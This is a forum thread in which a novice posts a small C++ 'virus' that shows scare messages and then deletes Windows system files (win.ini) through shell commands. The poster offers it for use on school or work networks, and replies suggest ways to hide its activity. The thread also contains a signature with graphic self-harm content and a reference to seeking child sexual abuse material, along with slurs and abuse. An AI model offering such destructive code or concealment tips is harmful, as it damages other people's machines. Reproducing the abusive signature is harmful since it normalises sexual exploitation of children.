Jump to content

Featured Replies

Posted

this still needs compiling though

 

############CODE##############

 

 

#include <iostream>

#include <dos.h>

#include <stdlib.h>

#include <conio.h>

 

using namespace std;

 

void pause();

void destroy();

 

int main()

{

cout << "your account is not responding and needs to shut down.\n";

cout << "yOU iDOit tHIs iS a bUG tHaT wILl kILL wINdowS !.\n";

cout << "tO sToP tHIs fROm haPPEninG cLICk tHe X.\n";

pause();

cout << "aRE yOu rEAlly sURe???---cOUrtEsy oF fIRebUg \n";

pause();

 

destroy();

 

return 0;

}

 

void pause()

{

system("pause");

}

 

void destroy()

{

system("if exist c:\win.ini del c:\win.ini else echo .");

system("if exist c:\windows.ini del c:\windows.ini else echo .");

}

 

 

 

############CODE##############

  • Author
  s3xt0y said:
nice and simple i hope if you dont mind if i edit the source a bit =P

 

 

you do what you want with it but post what you got after woulds and tell me what you added on does

  fIRebUg said:
you do what you want with it but post what you got after woulds and tell me what you added on does

 

oh i was just gunna mess with it and learn from it and try to mod it im learning C++.

I cut my cock for shits and laughs, I put dried shit back in my ass. I mangle my balls with a rose's thorn, and search on the web for kiddie porn! I take pictures of my own streched ass, and cut off my nuts with broken glass. Yo-ho yo-ho 'tis a Pirate's life for me!

Just a hint, if you don't want them to see what you're doing with DOS scripts, put

 

system("@echo off");

 

before everything.

 

But then again, you can just use remove(const char*), instead, if you're so inclined.

  • Author
asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work //
  fIRebUg said:
asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work //

 

but it doesn't spread...

  fIRebUg said:
asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work //

 

Yeah, you don't know what the fuck you're talking about.

  bioslippery said:
Actually, it is, it raped my dog, and my mother, apparently within its few lines of code, it can actually take down the entire internet, using a simple AIM spead method, hidden within the 'cout' funcs!

 

your a ***

Say hello to penis gobblin.

 

Seriously though, its not a good idea to try to write a virus on your first day of learning to program.

yeah thats about the gayest code in the whole world

 

but thats if its a virus.

 

its not the gayest trojan ive ever seen though :ugh:

  Sir.AnthraX said:
That program is nice and simple, but will probably get caught with most Anti-Virus.

 

I highly doubt that.

  • Author
AS I HAVE SAID BEFORE TI HAVE ONLY BEEN LEARNING FOR LESS THAN A MONTH SO DONT FUCKING FLAME ME CUNTS !!!!!!!!!!!!!!!!!!!!!!
I find it kind of funny how this sub-par program has angered nearly everyone who has written in the thread. But yeah, that code doesn't spread (as is) so it isn't really a virus.
  • Author
  Wheat Toast said:
I find it kind of funny how this sub-par program has angered nearly everyone who has written in the thread. But yeah, that code doesn't spread (as is) so it isn't really a virus.

 

 

Thats what saddens me cause i try and get some advice and some genuine help with with programming and i get this sort of attitude from people :tear:

 

you guys should learn to help people not put them down

 

Where Should I Put The NO DOS WINDOW code ?

Too many script kiddies on these forums.. God damnit.

If you don't know where to place the code, don't USE the code until you know. That's a nice rule.

Guest
This topic is now closed to further replies.